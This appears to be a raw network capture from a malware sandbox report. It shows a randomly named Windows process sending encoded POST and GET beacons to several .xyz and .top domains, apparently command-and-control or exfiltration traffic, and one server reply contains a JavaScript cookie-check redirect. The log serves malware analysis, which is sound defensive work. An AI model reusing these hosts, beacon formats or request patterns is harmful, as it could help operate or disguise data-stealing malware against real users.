Nov 24, 2024 08:14:19.048573971 CET	1784	OUT	POST /rum2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.soainsaat.xyz Origin: http://www.soainsaat.xyz Referer: http://www.soainsaat.xyz/rum2/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 65 57 70 76 78 50 6c 7a 5a 48 63 2b 70 77 6b 35 6c 47 75 48 67 6d 2f 39 32 2f 6c 2f 47 63 75 6f 41 6b 46 51 6d 45 64 4f 36 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 66 43 67 47 4f 64 75 42 62 65 35 64 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d [TRUNCATED] Data Ascii: 6vSXrZxp=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxeWpvxPlzZHc+pwk5lGuHgm/92/l/GcuoAkFQmEdO6tPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMfCgGOduBbe5dRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpFEUMAvBF4sD8cpJK+KkbbJi7Z0OqZQLrYS71f/4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4l/J45TtObzWIFPHkQZ8VO0T6Soay2PFgjaHia4tTWZFmnW0vX+mAJPQfCrFqETQ/a7omXFJyxtoqjHZNvLepOz+w687QYv3Hh0UXnyJYdvViBXqfYDTX0w4ez0PzATpTSu6ri7/+lBBwdC9zvb85SjKwBfSS+J5M7wYy4s/BIqMsKl2hlUIL3vJYweSSS8fEW8kIGm9TON8jRxpeyakc613YqOiyiDZmVpMGz0Z7/i2su6v9g8qmRh78caduIBxtBgP58hSkawQjEAMwxP559cOzoVeoYzgux6al0J8vEcKRO26YS3SdKQBmeCm+2D6IVZeWy7WM/GuxfjTL4V1MemELIv4rvgmSbFzkxKtwq+I31/yis3YrzdAtEAEfX5WZCcOMFCfnsNDFjT3Zp44JFKrstLWtHE2Uz2iNlqTnC7vq29RD1DTlA9wSR812dkbi4c1f5byddtdQH88vB/7u8agXhzbxh03umMRDAmwR58ial58pFl0GTUynDqzowolAKVpTtw0NZiU9G [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49986	85.159.66.93	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:21.713526011 CET	479	OUT	GET /rum2/?6vSXrZxp=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB3zcAk+0XRlHo47zsG34ZF8bKKHH4pA==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.soainsaat.xyz Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:14:23.128655910 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Sun, 24 Nov 2024 07:14:22 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-11-24T07:14:27.9027889Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49987	185.27.134.144	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:28.872050047 CET	741	OUT	POST /d9ku/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.amayavp.xyz Origin: http://www.amayavp.xyz Referer: http://www.amayavp.xyz/d9ku/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 73 59 49 30 59 48 37 4d 2b 71 67 70 34 2b 61 4b 38 45 49 70 4b 52 67 41 45 51 34 6c Data Ascii: 6vSXrZxp=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmsYI0YH7M+qgp4+aK8EIpKRgAEQ4l
Nov 24, 2024 08:14:30.104646921 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:14:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED] Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,\|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49988	185.27.134.144	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:31.531040907 CET	765	OUT	POST /d9ku/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.amayavp.xyz Origin: http://www.amayavp.xyz Referer: http://www.amayavp.xyz/d9ku/ Cache-Control: no-cache Content-Length: 221 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 42 63 6e 78 59 59 74 44 61 68 53 58 63 46 62 32 71 55 64 6b 4a 75 74 50 58 78 4e 42 58 61 69 4d 55 67 72 4d 70 34 6c 65 31 4a 4a 73 6e 6e 6b 4a 71 59 65 44 39 4d 37 75 53 67 68 6e 52 79 37 49 51 6e 64 38 42 44 45 6b 70 7a 47 74 51 2f 4a 77 4e 70 32 6f 7a 66 38 4b 7a 47 6b 69 35 31 57 33 57 41 77 72 36 37 67 72 73 47 57 70 45 6a 41 2b 57 44 2b 6d 42 73 67 61 45 61 59 6e 62 7a 6e 72 64 4d 2f 66 6d 55 74 32 42 79 66 47 67 6e 44 33 78 4e 4f 6f 57 46 47 68 74 50 49 49 73 44 53 57 68 50 4f 44 44 55 52 41 3d 3d Data Ascii: 6vSXrZxp=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzBcnxYYtDahSXcFb2qUdkJutPXxNBXaiMUgrMp4le1JJsnnkJqYeD9M7uSghnRy7IQnd8BDEkpzGtQ/JwNp2ozf8KzGki51W3WAwr67grsGWpEjA+WD+mBsgaEaYnbznrdM/fmUt2ByfGgnD3xNOoWFGhtPIIsDSWhPODDURA==
Nov 24, 2024 08:14:32.766488075 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:14:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED] Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,\|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.9	49989	185.27.134.144	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:34.191000938 CET	1778	OUT	POST /d9ku/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.amayavp.xyz Origin: http://www.amayavp.xyz Referer: http://www.amayavp.xyz/d9ku/ Cache-Control: no-cache Content-Length: 1233 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 59 32 35 61 43 76 2b 66 4b 6c 42 4d 6a 6d 64 6d 6e 57 69 71 48 54 4a 74 42 75 2f 45 58 7a 4a 63 6e 43 67 59 74 6b 4f 68 54 58 63 46 48 6d 71 56 64 6b 4a 76 74 50 2b 34 4e 47 66 73 69 50 67 67 35 65 68 34 6a 76 31 4a 65 38 6e 6e 6d 4a 71 62 42 7a 38 49 37 75 43 6b 68 6d 68 79 37 49 51 6e 64 36 6c 44 55 6c 70 7a 45 74 51 34 44 51 4e 31 6b 59 7a 6e 38 4b 62 73 6b 69 73 4f 57 47 71 41 7a 4c 71 37 6e 4f 41 47 4b 35 45 68 54 4f 57 68 2b 6d 4d 32 67 61 5a 68 59 6e 66 5a 6e 6f 4e 4d 37 2f 72 74 2b 6e 4d 71 4d 45 34 36 4b 67 5a 59 57 64 4b 64 4a 68 45 71 50 59 63 64 4d 6e 67 4c 64 77 79 2f 4f 61 4f 42 50 4b 38 48 6a 57 6f 46 4d 64 7a 68 2f 58 61 38 37 47 70 42 4c 2b 6a 4c 35 71 37 66 30 77 63 4f 2b 6c 75 46 77 6c 49 73 73 4f 58 64 76 56 41 71 4d 67 4e 79 2f 53 51 59 75 6e 6e 75 72 61 70 4b 52 4d 7a 74 36 6e 78 65 2b 6e 48 47 63 47 53 46 42 4b 61 47 4d 58 34 52 4f 47 39 48 70 4c 4e 50 75 68 72 2b 4c 76 69 52 6c 70 57 4b 53 34 49 6c 69 48 74 70 55 [TRUNCATED] Data Ascii: 6vSXrZxp=lCOuZ0pdMNytY25aCv+fKlBMjmdmnWiqHTJtBu/EXzJcnCgYtkOhTXcFHmqVdkJvtP+4NGfsiPgg5eh4jv1Je8nnmJqbBz8I7uCkhmhy7IQnd6lDUlpzEtQ4DQN1kYzn8KbskisOWGqAzLq7nOAGK5EhTOWh+mM2gaZhYnfZnoNM7/rt+nMqME46KgZYWdKdJhEqPYcdMngLdwy/OaOBPK8HjWoFMdzh/Xa87GpBL+jL5q7f0wcO+luFwlIssOXdvVAqMgNy/SQYunnurapKRMzt6nxe+nHGcGSFBKaGMX4ROG9HpLNPuhr+LviRlpWKS4IliHtpUVXNz934+9Pi/udq2eU5x5+9BRxQA6Ms9Q50JU9U4ubXoTFOwWeKWsNFlHfc2IMsH0DbT1Un5Gph91dhzheGUGJFMzbiNGT+trYSb0jZaOfsnRbrkRYItMilK7vR9U/cXDOyGTdhBIKg+WGgN1jB1++XfOjXNVPr7aVWR9+sEIGYNc+LBGCXBo48Jml4RRWzZav278v99rNzvQ3mE9PzdIZ5gvSv0TMj1yeZ8RVLVbqVgbtLTEhYIcOuQF9M2TidLZRkuhbs+0Hli1Dsmk5YxLrDqkU7XnICeE2KbRhUDl2OZX6Zy1L7iyykhtYbsHSzLn/2V8cA+KeB+HzCQIH9CcE3gU7QB2ux5ghf/+iZxNu98uy9Rh66pheqlYeRA6I5U0RTeatlwqMFVs0XVTcrNbxQyA/XdpIkf8BUTHFSBgErdFfb5EriNmHaAbVub/5yXpEEluW8jQOOCf0SCzUNgRY2xt75IAzZylL69cbkXDnaUL/02yUDmbxCdqMnoSmffpFpmW4dZhLEds1UPmhmhqxmTrZeYriaQ+b4eLy7ud3QHFSGQITvia5vJuOgue8lGColTkF+S20u7enhAYjCf7UIDklsuDBzPVJjWA0rtiUSX9jSnwamTZcKRcjqeevHudt8O5LYgxtb52ybZJpMg9sjmLR2muThbk0 [TRUNCATED]
Nov 24, 2024 08:14:35.516946077 CET	683	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:14:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Content-Encoding: br Data Raw: 31 62 39 0d 0a a1 f0 19 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e 76 b0 83 de e6 9a 3d fb 13 a4 1e 1c 73 6b 04 d2 25 81 69 3a 3d d4 6a 04 f0 93 8a f6 0c 93 91 b4 8b b0 bf c0 a8 69 45 37 66 ca 37 73 29 cb 09 46 ce c2 33 00 a7 2c 7c 7e d7 c6 0f 99 c8 0b 43 12 75 a8 11 a4 ca 58 77 e0 b0 a4 0d 4d 38 21 ff 10 f7 ed ff 14 89 27 bb f5 c8 01 ae 15 03 9f df d4 40 02 b0 6b 34 ad eb e7 e7 52 28 fa 4b 7f 4f ff 62 32 07 b8 9e cf e5 ee 52 87 af 04 f3 d4 02 c6 d4 41 5c bb 96 79 df f6 da f9 3e b1 3e 78 09 6f cc a7 fb be c4 31 ae 30 26 fe c5 85 04 1a 78 09 5f 76 d9 1b 12 f9 5f 6f 4f 02 40 ff 81 1d 67 4c 49 61 62 21 93 24 35 b9 e0 a5 e6 19 2b 84 51 4c c4 2a c7 84 2a 9b d7 a2 cc f2 5c a7 d6 da 92 eb 4c 88 bc 14 31 13 29 2b 99 ca 85 2b e3 01 d2 8f 59 cc 0a eb 0a a7 0a 1b 17 b9 51 22 75 3c 17 59 ca 74 ca 2d 77 66 c4 b5 99 e8 6d a3 27 80 29 c0 bf bf 4b bb 58 02 f6 91 86 08 76 fe fa fe 23 34 56 cf 77 d3 a5 a7 69 4a 25 55 84 f8 b8 46 91 f9 21 b4 [TRUNCATED] Data Ascii: 1b9 #MhEJ^3pNN57KNnv=sk%i:=jiE7f7s)F3,\|~CuXwM8!'@k4R(KOb2RA\y>>xo10&x_v_oO@gLIab!$5+QL**\L1)++YQ"u<Yt-wfm')KXv#4VwiJ%UF!+$:fcc]upXNv$R8@^EG"3F%-7(-h2G/JF(SJ3J+0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.9	49990	185.27.134.144	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:36.852869034 CET	477	OUT	GET /d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.amayavp.xyz Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 24, 2024 08:14:38.188205957 CET	1168	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Nov 2024 07:14:37 GMT Content-Type: text/html Content-Length: 967 Connection: close Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED] Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("5057ef7fb7e074db92f649325c26e6fd");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.amayavp.xyz/d9ku/?6vSXrZxp=oAmOaC9rLcmuYnVpEIiUFnJetHEZs2+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94atf+kZPaCRs8iMXYlGBxwothes9BXg==&av=Zj6TS2&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.9	49991	172.67.145.234	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:14:44.018094063 CET	735	OUT	POST /vg0z/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US Host: www.vayui.top Origin: http://www.vayui.top Referer: http://www.vayui.top/vg0z/ Cache-Control: no-cache Content-Length: 197 Connection: close Content-Type: application/x-www-form-urlencoded User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile Data Raw: 36 76 53 58 72 5a 78 70 3d 32 37 47 45 30 57 34 36 48 49 4c 61 57 71 56 57 64 4e 35 42 6a 6a 4b 4f 39 47 43 38 73 4d 57 78 4d 39 69 44 32 34 50 5a 2f 53 43 30 51 43 58 38 57 6b 6a 58 38 43 72 30 72 4c 50 41 41 44 70 47 6e 57 6b 65 7a 56 4d 4b 39 39 64 7a 37 32 56 5a 30 32 64 6b 51 61 43 4b 33 72 34 61 56 6a 59 70 73 69 4f 37 55 67 6a 6c 56 6f 69 62 46 34 7a 55 65 2b 61 39 76 77 59 48 6a 52 4f 6c 75 35 41 67 5a 75 77 4b 66 4f 41 43 45 5a 61 76 37 65 51 51 2f 50 66 61 58 4c 4a 37 36 69 43 2b 54 33 42 44 55 32 61 72 50 4b 36 73 2f 44 46 45 34 70 32 64 2f 32 38 49 4c 4f 51 52 56 55 4e 62 Data Ascii: 6vSXrZxp=27GE0W46HILaWqVWdN5BjjKO9GC8sMWxM9iD24PZ/SC0QCX8WkjX8Cr0rLPAADpGnWkezVMK99dz72VZ02dkQaCK3r4aVjYpsiO7UgjlVoibF4zUe+a9vwYHjROlu5AgZuwKfOACEZav7eQQ/PfaXLJ76iC+T3BDU2arPK6s/DFE4p2d/28ILOQRVUNb
Nov 24, 2024 08:14:45.606446981 CET	887	IN	HTTP/1.1 404 Not Found Date: Sun, 24 Nov 2024 07:14:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5689FjxHcuVXmWA34FOicsfxEV8J%2BwCFuKpVrosObE%2F4Bwko2nmqHZMwMtumXdnJ8tDsqa%2B4ctnh0pRLnyszIxxGVaPcHODdEJrs%2FY14pVlsl5pQnKyUs%2BOAB22vKsD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e779a971eed42ee-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=735&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.9	49992	172.67.145.234	80	1980	C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe

Timestamp	Bytes transferred	Direction	Data
